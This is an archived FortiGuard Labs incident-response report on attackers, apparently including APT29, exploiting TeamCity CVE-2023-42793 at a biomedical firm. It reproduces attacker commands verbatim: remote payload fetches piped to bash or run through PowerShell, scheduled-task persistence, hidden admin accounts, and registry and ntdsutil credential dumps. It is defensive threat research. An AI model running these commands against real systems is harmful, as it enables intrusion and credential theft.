{ "id": "13181762-6d36-4cd1-8760-41d89633ba12", "created_at": "2026-04-06T00:12:16.389047Z", "updated_at": "2026-04-10T03:37:32.963821Z", "deleted_at": null, "sha1_hash": "ed410e4ea8da7382544bb0e3567539523930b0d6", "title": "TeamCity Intrusion Saga: APT29 Suspected Among the Attackers Exploiting CVE-2023-42793 | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9207821, "plain_text": "TeamCity Intrusion Saga: APT29 Suspected Among the Attackers\r\nExploiting CVE-2023-42793 | FortiGuard Labs\r\nPublished: 2023-12-13 · Archived: 2026-04-05 17:30:17 UTC\r\nAffected Platforms: Machines running vulnerable JetBrains TeamCity versions (before 2023.05.4, per vendor advice)\r\nThreat Type: Remote Code Execution Vulnerability\r\nImpact: Remote code execution for unauthenticated users, enabling initial access to vulnerable servers\r\nSecurity Level: High\r\nCyber Kill Chain®\r\nIntroduction\r\nOn September 6, 2023, researchers from Sonar discovered a critical TeamCity On-Premises vulnerability (CVE-2023-\r\n42793[1]) issue.[2] TeamCity is a build management and continuous integration server from JetBrains[3]. On September 27,\r\n2023, a public exploit for this vulnerability was released by Rapid7[4]. This critical vulnerability was given a CVE score of\r\n9.8, most likely because an attacker can deploy the publicly available exploit without authentication supporting remote code\r\nexecution on the victim server using a basic web request to any accessible web server hosting the vulnerable application.\r\nThis vulnerability has been observed being actively exploited in the wild and was added to CISA's 'Known Exploited\r\nVulnerabilities Catalog' on October 4, 2023.[5]\r\nIn mid-October 2023, the FortiGuard Incident Response (IR) team sent a courtesy notification to an organization that had\r\nbeen compromised due to this vulnerability.  This organization engaged the FortiGuard IR team to investigate the malicious\r\nactivity in their network.\r\nThe victim was a US-based organization in the biomedical manufacturing industry. Our subsequent investigation determined\r\nthat initial access for the attack was through the exploitation of the CVE-2023-42793 TeamCity vulnerability using a\r\ncustom-built exploit script written in Python. The behavior of the malware used in post-exploitation matches the\r\nGraphicalProton malware used by APT29. This article breaks down our investigation and the outcome of our containment,\r\neradication, and remediation efforts. As part of this analysis, we look at threat actor TTPs employed throughout the intrusion\r\nand how they were identified and pieced together by the FortiGuard IR team. MITRE ATT\u0026CK mapping and observables\r\nare provided at the end of the article, alongside IOCs and FortiEDR Threat Hunting queries, to assist with threat-hunting\r\nactivities for similar behavior.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 1 of 31\n\nSummary of Attack\r\nFigure 1: The attack timeline of TeamCity intrusion described in this article.\r\nAnalysis\r\nVulnerability Exploitation\r\nAs part of our initial customer engagement, we examined several EDR events reported from one of the victim's Windows\r\napplication servers (HOST_1_TEAMCITY). During a scoping call, the FortiGuard IR team identified that one of the\r\napplications hosted on this server was TeamCity. The victim had only recently updated the application to a non-vulnerable\r\nversion.\r\nWe began by retrieving application and system logs from the suspected compromised server (HOST_1_TEAMCITY). On\r\nanalysis of the application logs, we identified significant evidence of successful exploitation of the TeamCity vulnerability.\r\nThe authentication bypass can be observed in the screenshot of the teamcity-auth.log file, shown in Figure 2.\r\nFigure 2: A snippet of the 'teamcity-auth.log' screenshot highlighting the TeamCity exploit evidence and associated remote\r\nIP.\r\nAnalysis of these logs showed that this vulnerability had been exploited multiple times over a relatively short period, with\r\nconnections originating from multiple unique public IP addresses. The teamcity-auth.log (authentication events log)\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 2 of 31\n\nidentifies successful exploitation but does not provide details on commands executed through exploitation. This information\r\nis available in the separate 'teamcity-server.log' file, a general server log for the TeamCity software. Analyzing this log file\r\naround confirmed attempted remote code execution on the same host. For example, the IP address 167[.]179[.]75[.]213\r\ntaken from the highlighted log entry in Figure 2 was correlated with the echo command execution log highlighted in the\r\n'teamcity-server.log' entry in Figure 3. Details of the external command execution from the 'teamcity-server.log file can also\r\nbe seen in Figure 3.\r\nFigure 3: A snippet of the 'teamcity-server.log' showing remote code execution evidence, including the associated command\r\nexecuted through the exploitation.\r\nFurther analysis of the various commands executed on the vulnerable server through this RCE exploit led the IR team to\r\nbelieve multiple threat actors were conducting simultaneous operations. Some commands executed as part of this intrusion\r\nare shown in Table 1.\r\nRemote IP Address Commands Executed\r\n167[.]179[.]75[.]213 Command line: whoami\r\n154[.]26[.]133[.]111 Command line: bash -c \"nproc 2\u003e\u00261\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c whoami\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c ipconfig /all\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c ipconfig /displaydns\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c hostname\"\r\n74[.]207[.]242[.]113 Command line: cmd.exe \"/c tasklist /svc\"\r\n74[.]207[.]242[.]113 Command line: cmd.exe \"/c netstat -ano\"\r\n74[.]207[.]242[.]113 Command line: cmd.exe \"/c net user /domain\"\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 3 of 31\n\n212[.]113[.]106[.]100 Command line: uname -a\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c whoami\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c systeminfo\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c net user\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c \"echo 167043640 \u003e C:/Windows/Temp/0\"\r\n43[.]248[.]34[.]77 Command line: echo 2W1EVQsV5piPbyW6FSsNC8D7irR\r\n103[.]89[.]13[.]155 Command line: echo 2W28BTpkdCjcRPQNkSF5qFCphlG\r\n195[.]246[.]120[.]4 Command line: echo 2W28BTpkdCjcRPQNkSF5qFCphlG\r\n20[.]222[.]6[.]225 Command line: echo 2W2GZqAg8k6ipgBTcHyK5wABDSW\r\n45[.]133[.]7[.]129 Command line: cmd.exe /c echo 9fW99pdqfpXU21zd\r\n45[.]133[.]7[.]154 Command line: cmd.exe \"/c net user \u003credacted\u003e \"\u003cpassword redacted\u003e\" /add\"\r\n45[.]133[.]7[.]154 Command line: cmd.exe \"/c echo \u003credacted\u003e | c:\\TeamCity\\bin\\anydesk.exe --set-password\"\r\n45[.]133[.]7[.]156\r\nCommand line: wget --no-check-certificate https[:]//fisheries-states-codes-camps.trycloudflare[.]com/rcu\r\n45[.]133[.]7[.]124 Command line: /bin/sh -c \"(curl -s 194.38.22[.]53/tc.sh||wget -q -O- 194.38.22[.]53/tc.sh)|bash\"\r\nTable 1. Commands executed by multiple threat actors on the TeamCity software host HOST_1_TEAMCITY.\r\nLooking critically at some of the attempted commands, it appears that some of the threat actors successfully exploited the\r\nvulnerability but were unsuccessful at running Linux system commands on the victim Windows Server. An example of this\r\nbehavior can be seen in Figure 4.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 4 of 31\n\nFigure 4: TeamCity log showing attempted Linux command execution by a threat actor following successful vulnerability\r\nexploitation.\r\nIt appears that several of the commands from various remote IPs may have been associated with the use of the open-source\r\nvulnerability scanner Nuclei[6]. The IR team found a Nuclei template (CVE-2023-42793.yaml) designed to identify the\r\npresence of the TeamCity vulnerability in Nuclei's official template repository[7]. The yaml template file contains the\r\nfollowing line:\r\nPOST /app/rest/debug/processes?exePath=echo\u0026params={{randstr}} HTTP/1.1\r\nThe resulting request would produce an echo command on a successfully exploited TeamCity server, identical to the echo\r\ncommands observed in the victims' TeamCity logs. The IR team collated information from both logs to better understand the\r\ncorrelations between when the echo commands were executed and the associated network connections from the numerous\r\npublic IP addresses. A snippet of this correlation is shown in Figure 5, where the echo commands generated by some of the\r\nNuclei scanning are also highlighted.\r\nFigure 5: A snippet of correlated logs showing network connections and subsequent commands. Highlighted are multiple\r\necho commands indicative of likely Nuclei scanning.\r\nAt this stage of the intrusion, it became clear that multiple threat actors were scanning for the vulnerability, validating if it\r\ncould be exploited, and attempting to establish a foothold using the related exploitation. The following section of this report\r\nfocuses on the activities of one of these threat actors distinct from other threat actor activities. We will refer to this culprit as\r\nthe 'main threat actor.' A description of the activities conducted by other threat actors exploiting this vulnerability is covered\r\nmore extensively in the following 'Other Threat Actors Activity' section.\r\nMain Threat Actor Intrusion\r\nThe first activity attributed to the main threat actor was the execution of an echo command like those discussed above,\r\nindicating that the main threat actor likely employed Nuclei to identify potential victims. After this initial command, the\r\nmain threat actor began executing additional discovery commands to gather system and privilege information. Some of these\r\ndiscovery commands are shown below:\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 5 of 31\n\ncmd.exe \"/c systeminfo\"\r\nwhoami\r\nipconfig /all\r\nwhoami /all\r\nThe command attributed to the Nuclei scanning, as well as these subsequent discovery commands, were linked to different\r\nremote IP addresses. However, we assessed them as being from the same actor due to the slight timeline difference of a few\r\nseconds between the activities. This indicates the main threat actor uses different infrastructures to scan for victims and\r\nexecute later commands.\r\nOne command and control (C2) IP address discovered during our investigation was linked to a US-based tertiary education\r\norganization. Upon detection of this active exploitation, the FortiGuard IR team notified the organization that their\r\ninfrastructure may have been compromised and part of an ongoing APT29 campaign. They performed an internal\r\ninvestigation and identified exploitation of their vulnerable TeamCity server associated with the previously identified IP\r\naddress. As part of this exploitation, the main threat actor used the TeamCity exploit to install an SSH certificate, which they\r\nthen used to maintain access in this second victim's environment. The organization's security team provided additional\r\ninformation to the FortiGuard IR team, who then identified that the source of the attack on the educational organization was\r\na TOR exit node. This report does not include the victim’s details used as a relay to protect their identity. They have\r\nsuccessfully remediated their environment and patched the associated vulnerability.\r\n After executing the discovery commands outlined above, the main threat actor attempted to download a DLL file,\r\n'AclNumsInvertHost.dll,' on the TeamCity host using PowerShell and the 'Invoke-WebRequest' cmdlet. The actor used the\r\nfollowing command to download the file:\r\npowershell -exec bypass -c \"Invoke-WebRequest -Uri\r\nhxxp[:]//103[.]76[.]128[.]34:8080/AclNumsInvertHost.dll -OutFile\r\nC:\\Windows\\System32\\AclNumsInvertHost.dll\"\r\nAfter successfully downloading this DLL file on the HOST_1_TEAMCITY, the main threat actor again used the TeamCity\r\nRCE vulnerability to create a Windows-scheduled task referencing this DLL file. They likely did this for persistence and to\r\nabstract their execution from the TeamCity exploitation. The actor used the following command to create the scheduled task:\r\nschtasks.exe /create /SC ONLOGON /tn\r\n\"\\Microsoft\\Windows\\DefenderUPDService\" /tr\r\n\"\\\"C:\\Windows\\system32\\rundll32.exe\\\"\r\n\\\"C:\\Windows\\system32\\AclNumsInvertHost.dll\\\",AclNumsInvertHost\"\r\nWe recovered the associated Windows task file from the victim TeamCity server (HOST_1_TEAMCITY), confirming that\r\nthe command in the TeamCity log had been successfully executed and the scheduled task was created. The retrieved\r\nWindows task data is shown in Figure 6:\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 6 of 31\n\nFigure 6: Windows task created by threat actor for the persistence of a DLL file.\r\nAfter successfully creating the scheduled task, the actor attempted to execute the newly created task using the following\r\ncommand, again executed through the TeamCity RCE vulnerability on the HOST_1_TEAMCITY:\r\nschtasks.exe /run /tn \"\\Microsoft\\Windows\\DefenderUPDService\"\r\nAnalyzing the scheduled task and its method of creation, we noticed two main indicators of interest: the URL\r\n'hxxp[:]//103[.]76[.]128[.]34:8080/AclNumsInvertHost.dll' and the file 'AclNumsInvertHost.dll.' We then analyzed the URL\r\nreferenced for downloading this payload. At the time of the incident, there was limited open-source information on the IP\r\ncontained in the URL or associated URLs. However, the certificate used on the webserver hosted at this IP was of interest.\r\nThe certificate is expired with the common name '*.ultasrv[.]com'. This common name does not appear to be associated with\r\na legitimate organization[8]. The entity associated with ultasrv[.]com seems to be a VPS (Virtual Private Server) provider.\r\nLooking more closely at the webserver itself, we identified that it had an accessible open directory service. We then used this\r\naccess to identify additional payloads hosted by the associated threat actor. The files on the server can be seen in Figure 7.\r\nFigure 7: Files from the opendir listing of the C2 server used by the threat actor associated with TeamCity exploitation.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 7 of 31\n\nSome information on the hosted files is provided in Table 2, along with associated file hashes.\r\nSr.\r\nNo.\r\nFilename Description SHA1 Hash\r\n1 a.zip Contains the rr.exe file e3a34930e5a814db0b5d0ac7c313cfb1c294b39e\r\n2 AclNumInvertHost.dll Malicious DLL d4411f70e0dcc2f88d74ae7251d51c6676075f6f\r\n3 ehttpserver.py Python HTTP server source code 5d3b03d7e74e7c378b25f53d1fc3605776edbcaf\r\n4 iis.zip\r\nContains iisexpresstray.exe,\r\nmscoree.dll, mscorees.dll\r\nabc50465a4b4108765a6cd6006c772fabd048458\r\n5 iisexpresstray.exe\r\nLegitimate executable from\r\nMicrosoft that is part of\r\nIISExpress setup/installer\r\nc7f2137331105686aa4eb39bcfe1bae23fa19956\r\n6 jaspic-providers.xml Apache Tomcat configuration file ed6c18c49a8bde1170c97698aeb1b85292a1967d\r\n7 mscoree.dll\r\nLegitimate DLL file from\r\nMicrosoft\r\nada02e4442daa69427a2815a8819f3a1285ad772\r\n8 mscorees.dll Malicious DLL 2df317b8a408d2ad5c94b9de6f20bbef03e46066\r\n9 omzu5a.ar Unknown file detected as data file 38860565592ce018b415ecd72bc2fb1a0742702c\r\n10 pdhui_1.dll Malicious DLL 5ce062f210e1a5026cb53e9949865312ee477e3c\r\n11 poc.py\r\nPoC python code used by the\r\nactor to exploit TeamCity\r\nvulnerability CVE-2023-42793\r\nbcbadf744954660f9a46324649eda6a14d724cbc\r\n12 rr.exe Unknown executable 18192bb4aaa1b72104be4d26460b55f31ca65baf\r\n13 server.py Python HTTP server code b2829fd893f26cb513018c4e03428f1ef5915da0\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 8 of 31\n\n14 sudoers Linux sudoer config file d3a19eb3db9f7fe8d984e124da95a4c1cafa332e\r\n15 winmms.dll Malicious DLL 3a32e516c037c37f7bf83171e167511ba53870a7\r\n16 winmm.dll\r\nLegitimate DLL file from\r\nMicrosoft\r\nd5cc1f2549fa138a931ad43d5d81d3a367c0de6e\r\n17 zabbix.zip\r\nContains pdhui_1.dll (a malicious\r\nDLL) and other legitimate Zabbix\r\n(opensource monitoring software)\r\nfiles\r\n281bb0dadc789b89f7ae30d5f4bdeae57c66b0e1\r\nTable 2. Descriptions of files found on the C2 server 103.76.128[.]34.\r\nAnalysis of the code in the poc.py file identified the script as a custom Python implementation of an exploit for the\r\nTeamCity vulnerability CVE-2023-42793. You can see the request URL found in the log and the Python code used to\r\ngenerate the request in Figure 8.\r\nFigure 8: A snippet of code from poc.py found on the C2 web server, and a snippet of the TeamCity log showing a similar\r\nrequest received by the victim during exploitation.\r\nComparing the structure of a request sent using this script and the commands executed from the victim logs, it is almost\r\ncertain that this script was used to deliver the exploit to the victim TeamCity server (HOST_1_TEAMCITY ). This links the\r\nIP extracted from the scheduled task (103[.]76[.]128[.]34) to the source of the exploitation from the logs shown in Figure 9\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 9 of 31\n\n(45[.]138[.]16[.]63). Using the FortiGuard Central Threat System (CTS), we could also see that the IP address associated\r\nwith the exploitation has been linked to other significant malicious activity. Of the 171 domains associated with this IP, 92\r\nhave been tagged with high confidence as malicious, and 78 have been tagged with high confidence as suspicious. Only one\r\nof the domains has been tagged as low risk (Figure 9).\r\nFigure 9: FortiGuard CTS information on the IP associated with the main threat actor TeamCity exploitation in the victim\r\nenvironment.\r\nThe other element of interest in the scheduled task created by the main threat actor was the DLL file,\r\n'AclNumsInvertHost.dll.' Our analysis identified that the DLL AclNumsInvertHost.dll has ten file sections. The most notable\r\nwas '.fy55f5', which is a user-modified section. This section has an MZ header (indicating it is a Windows portable\r\nexecutable), but the remainder of the code has a high entropy of 7.99, which is typically indicative of encryption. The\r\n'.fy55f5' section can be seen in Figure 10.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 10 of 31\n\nFigure 10: Encrypted code section of the AclNumsInvertHost.dll executed as part of the main threat actor's scheduled task\r\npersistence.\r\nThe IR team believes that this '.fy55f5' section of the DLL contains the final payload, which is decrypted at runtime. There\r\nare a number of anti-debug techniques implemented within the DLL file code that inhibited dynamic analysis during the\r\nengagement. To understand the DLL functionality more quickly, we performed comprehensive Yara scanning of all the files\r\npulled from the threat actors' webserver. The AclNumsInvertHost.dll library and multiple other DLL files matched on a Yara\r\nrule for a known malware family called 'GraphicalProton.' The positive Yara rule match was developed by Insikt Group from\r\nRecorded Future and is based on a specific API calling method employed by previously observed GraphicalProton samples.\r\nA match for this rule is a high-confidence indicator of GraphicalProton. The results of the matching Yara scan are shown in\r\nFigure 11.\r\nFigure 11: Yara rule for GraphicalProton matched against multiple DLL files found on the main threat actor opendir server.\r\nThe files in Figure 11 also matched the Yara rule M_Dropper_BURNTBATTER_1, which searches for the custom chaskey\r\nimplementation. This Yara rule was from the article, 'Backchannel Diplomacy: APT29's Rapidly Evolving Diplomatic\r\nPhishing Operations,' by Mandiant[9].\r\nGraphicalProton is a malware historically employed by group APT29. While this tooling is confidently linked to APT29\r\n(Mandiant) or BlueBravo (Recorded Future), the victimology and initial access vector employed by the main threat actor\r\nthroughout earlier stages of this intrusion does not align with currently reported APT29 campaigns. However, a previous\r\nwell-known attack from APT29 targeted the company Solarwinds, using the same build of the TeamCity management\r\ntool[10]. While the IR team could not attribute this activity to APT29 with high confidence, associated threat intelligence\r\nwas used to focus our investigation further.[11]\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 11 of 31\n\nAt this stage of the intrusion, FortiEDR detected and blocked this scheduled task from executing due to its suspicious use of\r\nrundll32.exe and a machine learning assessment of the previously unobserved DLL 'AclNumsInvertHost.dll.' This forced the\r\nmain threat actor to attempt alternative methods of execution.\r\nThe first alternative method was to use the TeamCity exploit on HOST_1_TEAMCITY to download the 'iisexpresstray.exe'\r\nand 'mscoree.dll' files from the same C2 through PowerShell. These two files were written to the directory'\r\nC:\\Windows\\WinStore\\'. The 'iisexpress.exe' file is a legitimate signed installer executable for IISExpress, a lightweight\r\nimplementation of IIS provided by Microsoft[12]. However, downloaded alongside this legitimate installer was\r\n'mscoree.dll,' a malicious DLL file with the same name as a legitimate DLL (T1036.005).[13] The combination of these two\r\nfiles would allow the threat actor to employ DLL search order hijacking (T1574.001)[14] to execute their malicious DLL\r\nwhen the legitimate IISExpress executable is executed.\r\nTo execute this side-loading attack, the main threat actor created another scheduled task using the following command\r\nexecuted via the TeamCity exploit:\r\nschtasks.exe /create /SC ONSTART /tn\r\n\"\\Microsoft\\Windows\\IISUpdateService\" /tr\r\n\"C:\\Windows\\WinStore\\iisexpresstray.exe\" /RU \"SYSTEM\" /f\r\nAfter the scheduled task was created, the threat actor executed the scheduled task using the following command:\r\nschtasks.exe /run /tn \"\\Microsoft\\Windows\\IISUpdateService\"\r\nWhen the 'iisexpresstray.exe' file was executed on the HOST_1_TEAMCITY, a separate thread was created by the malicious\r\nDLL file that tried to access the system credentials through lsass.exe. This attempt was also blocked by FortiEDR. This is\r\nshown in the event graph in Figure 12.\r\nFigure 12: FortiEDR blocked access to lsass.exe from iisexpresstray.exe.\r\nThe main threat actor had used multiple legitimate software in this attack. The list of legitimate files is shown in the table\r\nbelow. Some of the executables listed in Table 3 were recovered from the opendir[15] web server.\r\nSr.\r\nNo.\r\nFile Name Description\r\n1 iisexpresstray.exe Legitimate IIS Express exe used for the execution of malicious DLL mscorees.dll\r\n2 MpCmdRun.exe\r\nLegitimate Defender command line utility used for execution of malicious DLL\r\nMpCmdHelp.dll\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 12 of 31\n\n3 FlashUtil_ActiveX.exe Legitimate Flash exe used for the execution of malicious DLL oleac.dll\r\n4 zabbix_agentd.exe\r\nLegitimate executable to Zabbix software used to load the malicious DLL\r\npdhui_1.dll\r\nTable 3. List of legitimate software executables observed in the attack and on the C2 server, which are used to load malicious DLL files.\r\nSince FortiEDR blocked the execution of this second malicious DLL file, the main threat actor changed their approach and\r\nattempted to dump the registry using Windows utility reg.exe directly through further TeamCity exploitation. Unfortunately\r\nfor the main threat actor, FortiEDR blocked this execution due to the triggered rules 'Access to Critical System Information'\r\nand 'Connection Attempt from a Hidden Process' under its 'Exfiltration Prevention' security policy. A screenshot of the\r\nrelated FortiEDR event is shown in Figure 13.\r\nFigure 13: Attempt to dump system credentials using reg.exe was blocked by FortiEDR.\r\nThese attempts represent only two of the many credential dumping techniques the threat actor attempted to employ within\r\nthe victim environment. Fortunately, the FortiEDR software installed on the majority of their endpoints, including the victim\r\nserver, blocked these techniques. The associated EDR security events also generated multiple alerts. Unfortunately, the\r\ntargeted organization made numerous broad exceptions for this malicious behavior. This was likely due to the behavior\r\noriginating from the TeamCity application, so they were incorrectly assessed as a false positive. These exceptions are\r\noutlined below:\r\n1. allow rundll32.exe to run AclNumsInverHost.dll when rundll32.exe is executed by cmd.exe.\r\n2. allow reg.exe to run as a hidden process\r\n3. allow reg.exe to access critical system information (credential dumping)\r\n4. allow natid.sys to be loaded (a suspicious driver dropped by the threat actor)\r\n5. allow rundll32.exe to execute AclNumsInvertHost.dll and create a thread in any lsass.exe process\r\n6. allow rundll32.exe to execute AclNumsInvertHost.dll and create a thread in any svchost.exe process\r\n7. allow any execution of PowerShell and associated rule violations\r\nThese exceptions removed the constraints around the adversary's ability to fully employ their TeamCity exploitation,\r\nallowing the main threat actor to continue their execution unrestricted by FortiEDR.\r\nAfter these exceptions were set, the main threat actor was able to successfully dump the registry of the Windows host\r\nHOST_1_TEAMCITY to gain access to local user credentials (T1003.002)[16]. To achieve this, the threat actor used reg.exe\r\nto dump the SYSTEM registry hive (T1003.002[17]) using the command below:\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 13 of 31\n\nreg.exe save HKLM\\SYSTEM “C:\\Windows\\temp\\1\\sy.sa” /y\r\nThis can be seen in the FortiEDR Threat Hunting event shown in Figure 14.\r\nFigure 14: FortiEDR Threat Hunting event associated with the reg.exe process being used to dump the SYSTEM registry\r\nhive.\r\nAt this stage, the main threat actor continued to employ their TeamCity exploit for execution, trying alternative techniques to\r\nestablish a more robust foothold on the HOST_1_TEAMCITY. They used their access to create a Windows account,\r\n'oldadministrator' (T1136.001[18]), added the newly created account to the local administrators group, and made the account\r\na special account by adding it to the registry path 'NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist' with the\r\nDWORD value 0. When a Windows user account is added to this registry location with value 0, the account is not shown on\r\nthe Windows GUI login screen. This was likely done to hide their new access and ensure persistence from direct observation\r\nby normal system users. However, the IR team did not observe that the main actor ever used this newly created\r\n'oldadministrator' account. Log events associated with these activities can be observed in the teamcity-server.log snippet\r\nshown in Figure 15.\r\nFigure 15: Extract from the TeamCity application logs showing the commands used to create a new local Windows user on\r\nthe victim endpoint.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 14 of 31\n\nAt this time, the host HOST_1_TEAMCITY was patched for CVE-2023-42793. The IR team verified the patch was\r\nsuccessful and that there was no further exploitation of this vulnerability on this host following the installation of the patch.\r\nUnfortunately, the threat actor had already created alternative access through their GraphicalProton implant and had already\r\nbegun laterally moving to other hosts within the victim network through SMB, RDP, and remote WMIC commands.\r\nThe hosts HOST_3_SVR and HOST_4_SVR were targeted using WMIC commands (T1047)[19] from the original\r\ncompromised host, HOST_1_TEAMCITY. The network connections linked to this behavior were established using explicit\r\ncredentials. This indicates that the main threat actor had successfully pulled credentials prior to this activity. The IR team\r\nthinks this WMIC activity was likely conducted to execute a GraphicalProton DLL through either rundll32 proxy execution\r\nlike that demonstrated in the previously discussed scheduled task or through search order hijacking using one of the binary\r\nand DLL pairs pulled from the main threat actor C2 opendir web server. You can see evidence of the network connection\r\nassociated with this WMIC activity from the Windows event log in Figure 16.\r\nFigure 16: Windows log screenshot showing WMIC.exe execution remotely from HOST_1_TEAMCITY to HOST_4_SVR\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 15 of 31\n\nOn the HOST_2_SVR, the main threat actor employed a different lateral movement technique by establishing an RDP\r\nconnection from the HOST_1_TEAMCITY. This connection was used to create multiple suspicious files in the\r\n'C:\\Windows\\SchCache’ directory on HOST_2_SVR. Two DLL files (‘oleacc.dll’ and ‘oleac.dll’) and one executable file\r\n(‘FlashUtil_ActiveX.exe’) were created in this directory. When the IR team ran a Yara scan against these files, the DLL file\r\noleac.dll matched the Yara rule for GraphicalProton. The remaining files, oleacc.dll and FlashUtil_ActiveX.exe, were\r\ndetermined to be non-malicious Microsoft-signed files.\r\nThe main threat actor then created persistence for this file through a scheduled task. This time, the task was named\r\n'WindowsActiveX' and was created to execute the 'C:\\Windows\\SchCache\\FlashUtil_ActiveX.exe' file when Windows\r\nstarts. This shows the use of another legitimate executable to perform search order hijacking to load a malicious\r\nGraphicalProton DLL. The command used to create this scheduled task can be observed in the FortiEDR Threat Hunting\r\nevent, shown in Figure 17.\r\nFigure 17: FortiEDR Threat Hunting event showing the creation of a scheduled task for FlashUtil_ActiveX.exe\r\nIn another credential dumping attempt, the main threat actor tried to dump active directory credentials using the Windows\r\nutility ‘ntdsutil.exe’ on the host HOST_2_SVR. They tried to dump credentials using the following command:\r\nntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\\tempp' q q\r\nThis command aims to dump the ntds.dit file, the SYSTEM registry hive, and the SECURITY registry hives in the given\r\npath (in this case, ‘C:\\tempp’). Threat actors can often dump password hashes from these files offline using tools like\r\nmimikatz.[20] FortiEDR blocked this activity, and the associated security event can be observed in Figure 18.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 16 of 31\n\nFigure 18: Execution of ntdsutil.exe to dump ntds.dit file was blocked by FortiEDR.\r\nIn addition to this scheduled task, the IR team found another GraphicalProton DLL in the ‘C:\\Program Files\\Windows\r\nDefender’ directory. This directory contained an executable PE file, ‘MpCmdRun.exe,’ and DLL files, ‘MpCmdHelp.dll’ and\r\n‘MpClient.dll.’ One of the files (MpCmdHelp.dll) matched against the Yara rule for malware GraphicalProton, and the\r\nsecond DLL file, MpClient.dll, is a legitimate library used by ‘MpCmdRun.exe.’ Like the ‘FlashUtil_ActiveX.exe’ example\r\ndiscussed earlier in this report, the ‘MpCmdRun.exe’ is a legitimate binary vulnerable to search order hijacking. The\r\n‘MpCmdRun.exe’ binary is an official command-line tool used to perform various operations related to Microsoft Defender\r\nAntivirus. The default path of this binary is ‘C:\\Program Files\\Windows Defender.’\r\nAt this investigation stage, the team performed large-scale Yara scanning to identify additional potentially compromised\r\nhosts. This scanning identified DLL files matching the GraphicalProton signature written to disk on the hosts HOST_6_SQL\r\nand HOST_7_SVR. On both hosts, a task named ‘WindowsDefenderService’ that executed the GraphicalProton DLLs was\r\ncreated, matching the tradecraft of the previously discussed scheduled tasks. One of the scheduled task files associated with\r\nthese tasks can be seen in Figure 19.\r\nFigure 19: Schedule task file for proxy execution of the malicious GraphicalProton DLL file identified on HOST_6_SQL.\r\nThe IR team also found a network login to HOST_5_SVR from the primary infected HOST_1_TEAMCITY host.\r\nShortly after this login event, an instance of rundll32 used for proxy execution of another GraphicalProton sample was\r\nstarted. However, the process crashed. This resulted in a memory dump of the rundll32.exe process. The IR team performed\r\nstrings analysis of the memory dump and found URLs of graph.microsoft[.]com and 1drv[.]ms, which are legitimate\r\ndomains related to Microsoft OneDrive operations. The IR team also found an email address (quentparoty[@]outlook.com)\r\nin the memory dump, although this indicator has not been linked to any known IOCs. However, it has been included for\r\ncompleteness. Significant strings extracted from the memory dump can be seen in Figure 20.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 17 of 31\n\nFigure 20: Strings from memory analysis of crash dump showing email address and URL of OneDrive.\r\nSimilar network indicators were identified when we executed the AclNumsInvertHost.dll file using rundll32.exe in a virtual\r\nanalysis environment. The IR team also observed connections to api.dropboxapi[.]com from the rundll32.exe in the Threat\r\nHunting data of the victim environment. The GraphicalProton report[21] from Insikt Group from Recorded Future showed\r\nthat researchers had previously observed GraphicalProton samples employ Microsoft OneDrive and Dropbox as part of their\r\nC2.\r\nThe malicious DLL samples were shared with analysts from the FortiGuard Forensics Team for further malware analysis.\r\nThey confirmed that the behavior of the multiple malicious DLL matches GraphicalProton malware behavior. The malicious\r\nDLL was communicating with Microsoft OneDrive, and the following information was obtained in JSON format from this\r\ncommunication.\r\nKey Value\r\n@odata.context https://graph[.]microsoft[.]com/v1.0/$metadata#users('quentparoty%40outlook[.]com')/drive/root/$entit\r\nname blatant\r\nwebUrl https://1drv[.]ms/f/s!AGVbcHFCdi2qmmw\r\ndisplayName quent-application\r\ndriveId aa2d764271705b65\r\ndriveType personal\r\nid AA2D764271705B65!106\r\nfolder name quent-application\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 18 of 31\n\npath 